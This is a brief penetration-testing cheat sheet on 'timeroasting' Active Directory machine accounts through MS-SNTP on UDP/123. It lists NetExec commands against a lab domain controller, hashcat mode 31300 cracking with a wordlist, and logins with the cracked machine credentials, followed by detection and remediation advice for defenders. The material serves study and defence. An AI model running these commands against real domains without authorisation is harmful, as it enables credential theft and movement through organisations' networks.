Timeroasting targets machine accounts by abusing Microsoft SNTP authentication on domain controllers.
It is niche, but it can produce crackable material for machine accounts when UDP/123 is reachable.
Requirements
Domain controller reachable on UDP/123
Machine accounts in the domain
Tooling that supports MS-SNTP timeroast
Hashcat mode 31300
Domain controllers usually expose time service because Kerberos depends on time synchronization.
NetExec
Run:
sudo nxc smb 10.10.10.200 -M timeroast
Save output:
sudo nxc smb 10.10.10.200 -M timeroast | tee timeroast.txt
Extract hashes into:
timeroast.hashes
Crack
Hashcat mode:
31300
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 31300 timeroast.hashes /usr/share/wordlists/rockyou.txt --show
Validate
If a machine account password is cracked:
nxc smb 10.10.10.200 -d ootw.local -u 'MACHINE$' -p 'cracked-password'
nxc ldap 10.10.10.200 -d ootw.local -u 'MACHINE$' -p 'cracked-password'
Quote machine account names because $ has shell meaning.
Detection
Defenders look for:
- unusual UDP/123 traffic volume to domain controllers
- NTP requests from non-standard clients
- follow-on authentication using machine accounts
- machine account logons from unexpected source hosts
- NetExec execution on attacker-controlled systems
Standard Windows event logs may not clearly expose the roast itself. Network telemetry is important.
Remediation
- restrict UDP/123 access to expected clients where possible
- monitor abnormal time service requests to DCs
- rotate suspected machine account passwords
- remove stale computer accounts
- alert on machine account logons from non-machine sources